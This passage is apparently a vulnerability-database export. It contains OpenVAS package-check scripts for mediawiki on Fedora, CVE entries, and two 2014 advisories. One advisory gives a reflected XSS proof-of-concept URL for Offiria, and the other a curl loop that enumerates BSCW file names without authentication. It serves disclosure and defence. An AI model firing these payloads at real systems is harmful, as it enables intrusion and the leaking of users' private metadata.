should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867678\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:15:34 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2665\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-4511\");\n script_tag(name:\"affected\", value:\"mediawiki on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-4511\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131306.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mediawiki'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.8~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:22", "bulletinFamily": "scanner", "description": "Check for the Version of mediawiki", "modified": "2017-07-10T00:00:00", "published": "2014-04-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867678", "id": "OPENVAS:867678", "title": "Fedora Update for mediawiki FEDORA-2014-4511", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-4511\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867678);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:15:34 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2665\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-4511\");\n\n tag_insight = \"MediaWiki is the software used for Wikipedia and the other Wikimedia\nFoundation websites. Compared to other wikis, it has an excellent\nrange of features and support for high-traffic websites using multiple\nservers\n\nThis package supports wiki farms. Read the instructions for creating wiki\ninstances under /usr/share/doc/mediawiki-1.21.8/README.RPM.\nRemember to remove the config dir after completing the configuration.\n\";\n\n tag_affected = \"mediawiki on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-4511\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131306.html\");\n script_summary(\"Check for the Version of mediawiki\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.8~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:48:57", "bulletinFamily": "scanner", "description": "Check for the Version of mediawiki", "modified": "2017-07-10T00:00:00", "published": "2014-04-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867675", "id": "OPENVAS:867675", "title": "Fedora Update for mediawiki FEDORA-2014-4478", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mediawiki FEDORA-2014-4478\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867675);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:14:56 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-1610\", \"CVE-2013-6452\", \"CVE-2013-6451\", \"CVE-2013-6454\",\n \"CVE-2013-6453\", \"CVE-2013-6472\", \"CVE-2014-2665\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Update for mediawiki FEDORA-2014-4478\");\n\n tag_insight = \"MediaWiki is the software used for Wikipedia and the other Wikimedia\nFoundation websites. Compared to other wikis, it has an excellent\nrange of features and support for high-traffic websites using multiple\nservers\n\nThis package supports wiki farms. Read the instructions for creating wiki\ninstances under /usr/share/doc/mediawiki/README.RPM.\nRemember to remove the config dir after completing the configuration.\n\";\n\n tag_affected = \"mediawiki on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-4478\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131292.html\");\n script_summary(\"Check for the Version of mediawiki\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"mediawiki\", rpm:\"mediawiki~1.21.8~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2019-05-29T18:13:44", "bulletinFamily": "NVD", "description": "OrbiTeam BSCW before 5.0.8 allows remote attackers to obtain sensitive metadata via the inf operations (op=inf) to an object in pub/bscw.cgi/.", "modified": "2018-10-09T19:43:00", "id": "CVE-2014-2301", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2301", "published": "2014-05-12T14:55:00", "title": "CVE-2014-2301", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:13:45", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in Offiria 2.1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to installer/index.php.", "modified": "2018-10-09T19:43:00", "id": "CVE-2014-2689", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2689", "published": "2014-05-08T14:29:00", "title": "CVE-2014-2689", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory ID: HTB23210\r\nProduct: Offiria\r\nVendor: Slashes &amp; Dots Sdn Bhd.\r\nVulnerable Version(s): 2.1.0 and probably prior\r\nTested Version: 2.1.0\r\nAdvisory Publication: April 2, 2014 [without technical details]\r\nVendor Notification: April 2, 2014 \r\nPublic Disclosure: May 7, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-2689\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Offiria, which can be exploited to perform Cross-Site Scripting (XSS) attacks against users of vulnerable application.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in Offiria: CVE-2014-2689\r\n\r\n\r\nThe vulnerability exists due to insufficient sanitisation of user-supplied data in URI after "/installer/index.php" script that is not removed from the system by default. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\n\r\nThe following exploitation example displays "immuniweb" word:\r\n\r\nhttp://[host]/installer/index.php/%22onmouseover%3d%22alert%28%27immuniweb%27%29;%22%3d%22%3E\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nCurrently we are not aware of any official solution for this vulnerability. The vendor did not respond to:\r\n- 6 notifications by email\r\n- 1 notification via twitter\r\n- 1 notification via GitHub\r\n\r\nAs a temporary solution it is recommended to remove the vulnerable script or restrict access to it via .htaccess file or WAF. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23210 - https://www.htbridge.com/advisory/HTB23210 - Cross-Site Scripting (XSS) in Offiria.\r\n[2] Offiria - https://offiria.com - Offiria is a private, secure Enterprise Social Network for your organization.\r\n[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[4] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "modified": "2014-05-10T00:00:00", "published": "2014-05-10T00:00:00", "id": "SECURITYVULNS:DOC:30716", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30716", "title": "[oss-security] CVE Request ---- SOAPpy 0.12.5 Multiple Vulnerabilities", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory ID: HTB23210\r\nProduct: Offiria\r\nVendor: Slashes &amp; Dots Sdn Bhd.\r\nVulnerable Version(s): 2.1.0 and probably prior\r\nTested Version: 2.1.0\r\nAdvisory Publication: April 2, 2014 [without technical details]\r\nVendor Notification: April 2, 2014 \r\nPublic Disclosure: May 7, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-2689\r\nRisk Level: Medium \r\nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Solution Available\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in Offiria, which can be exploited to perform Cross-Site Scripting (XSS) attacks against users of vulnerable application.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in Offiria: CVE-2014-2689\r\n\r\n\r\nThe vulnerability exists due to insufficient sanitisation of user-supplied data in URI after "/installer/index.php" script that is not removed from the system by default. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\n\r\nThe following exploitation example displays "immuniweb" word:\r\n\r\nhttp://[host]/installer/index.php/%22onmouseover%3d%22alert%28%27immuniweb%27%29;%22%3d%22%3E\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nCurrently we are not aware of any official solution for this vulnerability. The vendor did not respond to:\r\n- 6 notifications by email\r\n- 1 notification via twitter\r\n- 1 notification via GitHub\r\n\r\nAs a temporary solution it is recommended to remove the vulnerable script or restrict access to it via .htaccess file or WAF. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23210 - https://www.htbridge.com/advisory/HTB23210 - Cross-Site Scripting (XSS) in Offiria.\r\n[2] Offiria - https://offiria.com - Offiria is a private, secure Enterprise Social Network for your organization.\r\n[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[4] ImmuniWeb\u00ae - https://portal.htbridge.com/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "modified": "2014-05-10T00:00:00", "published": "2014-05-10T00:00:00", "id": "SECURITYVULNS:DOC:30715", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30715", "title": "Cross-Site Scripting (XSS) in Offiria", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "description": "\r\n\r\nAdvisory: Metadata Information Disclosure in OrbiTeam BSCW\r\n\r\nRedTeam Pentesting discovered an information disclosure vulnerability in\r\nOrbiTeam's BSCW collaboration software. An unauthenticated attacker can\r\ndisclose metadata about internal objects which are stored in BSCW.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: BSCW\r\nAffected Versions: BSCW <=5.0.7\r\nFixed Versions: BSCW >=5.0.8\r\nVulnerability Type: Information Disclosure\r\nSecurity Risk: medium\r\nVendor URL: http://www.bscw.de/english/product.html\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-003\r\nAdvisory Status: published\r\nCVE: CVE-2014-2301\r\nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2301\r\n\r\n\r\nIntroduction\r\n============\r\n\r\n"The BSCW shared workspace system is the tool of choice for efficient\r\ngroup collaboration. BSCW permits the creation of documents,\r\nappointments, contacts, tasks and notes within shared workspaces.\r\nWithout having to install additional software, team members can access\r\nthis data around-the-clock, from anywhere in the world. Mission-critical\r\ninformation is constantly available to all authorised personnel\r\nregardless of location, ensuring that complex workflows can be\r\ncoordinated with minimal effort."\r\n\r\n(from OrbiTeam's homepage)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nBSCW uses the URL parameter "op" to select different functions of the\r\napplication. For example the password reset dialog can be used by\r\nopening the following URL:\r\n\r\nhttps://www.example.com/pub/bscw.cgi/?op=chpwd\r\n\r\nThe server maps the value provided by the parameter "op" to locally\r\nstored python modules which provide handler functions that are called to\r\ngenerate HTTP responses. It was discovered that sensitive metadata about\r\ninternally stored objects of BSCW can be disclosed by using the "inf"\r\noperation.\r\n\r\nWhen opening the following URL, the filename of a document which\r\nis identified by the value "12345" is disclosed in the response\r\nsent by the server (output shortened):\r\n\r\n$ curl --header 'Cookie: _pub_bscws="e4efb9e7ace7a12de82aa7a4aff1ab2a:1"' \\r\n "http://www.example.com/pub/bscw.cgi/12345?op=inf"\r\n[...]\r\n<table summary="" class="iTab" border="0" cellspacing="1" cellpadding="4" width="440">\r\n <tr valign="top">\r\n <td class="iLabel" id="small" width="88">Name</td>\r\n <td class="iValueB" width="352">Contract-XXXXX.doc</td>\r\n </tr>\r\n</table>\r\n[...]\r\n\r\nThe cookie used in the above command is generated by requesting the\r\nlogin page of BSCW. It is not necessary to enter credentials.\r\n\r\nBy iterating over the ids which are assigned in ascending order,\r\nattackers can enumerate the names of all objects stored in BSCW without\r\nprior authentication. This includes filenames and email addresses.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nWhen the following loop is run with a valid (but unauthenticated) BSCW\r\ncookie, it will find names for the BSCW objects 10000 to 30000:\r\n\r\n$ for id in `seq 10000 30000`; do\r\n filename = `curl --silent --header 'Cookie: _pub_bscws="COOKIE_COOKIE_COOKIE"' \\r\n "http://www.example.com/pub/bscw.cgi/${id}?op=inf" | \\r\n grep "iValueB" | \\r\n sed -e 's;^.*<td class="iValueB" width="352">\(.*\)</td>.*$;\1;'`\r\n echo "${id}: ${filename}"\r\ndone\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nIt may be possible to add another authentication layer, for example\r\nHTTP-Authentication, to limit access to this BSCW information disclosure\r\nto persons authorized to use BSCW anyway.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpdate to version 5.0.8.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThe risk is estimated to be medium. This vulnerability does not allow\r\nattackers to access files stored in BSCW. They can however retrieve\r\nfilenames, which may be enough to draw conclusions about the\r\ncorresponding file contents, and other potentially sensitive data such\r\nas email addresses.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2014-02-20 Vulnerability identified\r\n2014-03-04 Customer approved disclosure to vendor\r\n2014-03-06 CVE number requested and assigned\r\n2014-03-07 Vendor notified\r\n2014-03-10 Vendor acknowledges vulnerability\r\n2014-04-22 Vendor released fixed version\r\n2014-05-08 Advisory released\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests, short pentests,\r\nperformed by a team of specialised IT-security experts. Hereby, security\r\nweaknesses in company networks or products are uncovered and can be\r\nfixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at\r\nhttps://www.redteam-pentesting.de.\r\n\r\n-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschaftsfuhrer: Patrick Hof, Jens Liebchen\r\n\r\n", "modified": "2014-05-10T00:00:00", "published": "2014-05-10T00:00:00", "id": "SECURITYVULNS:DOC:30713", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30713", "title": "[RT-SA-2014-003] Metadata Information Disclosure in OrbiTeam BSCW", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:55", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2014-05-10T00:00:00", "published": "2014-05-10T00:00:00", "id": "SECURITYVULNS:VULN:13764", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13764", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:10", "bulletinFamily": "exploit", "description": "", "modified": "2014-05-08T00:00:00", "published": "2014-05-08T00:00:00", "href": "https://packetstormsecurity.com/files/126551/OrbiTeam-BSCW-5.0.7-Metadata-Information-Disclosure.html", "id": "PACKETSTORM:126551", "type": "packetstorm", "title": "OrbiTeam BSCW 5.0.7 Metadata Information Disclosure", "sourceData": "`Advisory: Metadata Information Disclosure in OrbiTeam BSCW \n \nRedTeam Pentesting discovered an information disclosure vulnerability in \nOrbiTeam's BSCW collaboration software. An unauthenticated attacker can \ndisclose metadata about internal objects which are stored in BSCW. \n \n \nDetails \n======= \n \nProduct: BSCW \nAffected Versions: BSCW <=5.0.7 \nFixed Versions: BSCW >=5.0.8 \nVulnerability Type: Information Disclosure \nSecurity Risk: medium \nVendor URL: http://www.bscw.de/english/product.html \nVendor Status: fixed version released \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-003 \nAdvisory Status: published \nCVE: CVE-2014-2301 \nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2301 \n \n \nIntroduction \n============ \n \n\"The BSCW shared workspace system is the tool of choice for efficient \ngroup collaboration. BSCW permits the creation of documents, \nappointments, contacts, tasks and notes within shared workspaces. \nWithout having to install additional software, team members can access \nthis data around-the-clock, from anywhere in the world. Mission-critical \ninformation is constantly available to all authorised personnel \nregardless of location, ensuring that complex workflows can be \ncoordinated with minimal effort.\" \n \n(from OrbiTeam's homepage) \n \n \nMore Details \n============ \n \nBSCW uses the URL parameter \"op\" to select different functions of the \napplication. For example the password reset dialog can be used by \nopening the following URL: \n \nhttps://www.example.com/pub/bscw.cgi/?op=chpwd \n \nThe server maps the value provided by the parameter \"op\" to locally \nstored python modules which provide handler functions that are called to \ngenerate HTTP responses. It was discovered that sensitive metadata about \ninternally stored objects of BSCW can be disclosed by using the \"inf\" \noperation. \n \nWhen opening the following URL, the filename of a document which \nis identified by the value \"12345\" is disclosed in the response \nsent by the server (output shortened): \n \n$ curl --header 'Cookie: _pub_bscws=\"e4efb9e7ace7a12de82aa7a4aff1ab2a:1\"' \\ \n\"http://www.example.com/pub/bscw.cgi/12345?op=inf\" \n[...] \n<table summary=\"\" class=\"iTab\" border=\"0\" cellspacing=\"1\" cellpadding=\"4\" width=\"440\"> \n<tr valign=\"top\"> \n<td class=\"iLabel\" id=\"small\" width=\"88\">Name</td> \n<td class=\"iValueB\" width=\"352\">Contract-XXXXX.doc</td> \n</tr> \n</table> \n[...] \n \nThe cookie used in the above command is generated by requesting the \nlogin page of BSCW. It is not necessary to enter credentials. \n \nBy iterating over the ids which are assigned in ascending order, \nattackers can enumerate the names of all objects stored in BSCW without \nprior authentication. This includes filenames and email addresses. \n \n \nProof of Concept \n================ \n \nWhen the following loop is run with a valid (but unauthenticated) BSCW \ncookie, it will find names for the BSCW objects 10000 to 30000: \n \n$ for id in `seq 10000 30000`; do \nfilename = `curl --silent --header 'Cookie: _pub_bscws=\"COOKIE_COOKIE_COOKIE\"' \\ \n\"http://www.example.com/pub/bscw.cgi/${id}?op=inf\" | \\ \ngrep \"iValueB\" | \\ \nsed -e 's;^.*<td class=\"iValueB\" width=\"352\">\\(.*\\)</td>.*$;\\1;'` \necho \"${id}: ${filename}\" \ndone \n \n \nWorkaround \n========== \n \nIt may be possible to add another authentication layer, for example \nHTTP-Authentication, to limit access to this BSCW information disclosure \nto persons authorized to use BSCW anyway. \n \n \nFix \n=== \n \nUpdate to version 5.0.8. \n \n \nSecurity Risk \n============= \n \nThe risk is estimated to be medium. This vulnerability does not allow \nattackers to access files stored in BSCW. They can however retrieve \nfilenames, which may be enough to draw conclusions about the \ncorresponding file contents, and other potentially sensitive data such \nas email addresses. \n \n \nTimeline \n======== \n \n2014-02-20 Vulnerability identified \n2014-03-04 Customer approved disclosure to vendor \n2014-03-06 CVE number requested and assigned \n2014-03-07 Vendor notified \n2014-03-10 Vendor acknowledges vulnerability \n2014-04-22 Vendor released fixed version \n2014-05-08 Advisory released \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests, short pentests, \nperformed by a team of specialised IT-security experts. Hereby, security \nweaknesses in company networks or products are uncovered and can be \nfixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at \nhttps://www.redteam-pentesting.de. \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/126551/rt-sa-2014-003.txt"}, {"lastseen": "2016-12-05T22:14:30", "bulletinFamily": "exploit", "description": "", "modified": "2014-05-07T00:00:00", "published": "2014-05-07T00:00:00", "href": "https://packetstormsecurity.com/files/126530/Offiria-2.1.0-Cross-Site-Scripting.html", "id": "PACKETSTORM:126530", "type": "packetstorm", "title": "Offiria 2.1.0 Cross Site Scripting", "sourceData": "`Advisory ID: HTB23210 \nProduct: Offiria \nVendor: Slashes & Dots Sdn Bhd. \nVulnerable Version(s): 2.1.0 and probably prior \nTested Version: 2.1.0 \nAdvisory Publication: April 2, 2014 [without technical details] \nVendor Notification: April 2, 2014 \nPublic Disclosure: May 7, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-2689 \nRisk Level: Medium \nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) \nSolution Status: Solution Available \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in Offiria, which can be exploited to perform Cross-Site Scripting (XSS) attacks against users of vulnerable application. \n \n \n1) Reflected Cross-Site Scripting (XSS) in Offiria: CVE-2014-2689 \n \n \nThe vulnerability exists due to insufficient sanitisation of user-supplied data in URI after \"/installer/index.php\" script that is not removed from the system by default. A remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \n \nThe following exploitation example displays \"immuniweb\" word: \n \nhttp://[host]/installer/index.php/%22onmouseover%3d%22alert%28%27immuniweb%27%29;%22%3d%22%3E \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nCurrently we are not aware of any official solution for this vulnerability. The vendor did not respond to: \n- 6 notifications by email \n- 1 notification via twitter \n- 1 notification via GitHub \n \nAs a 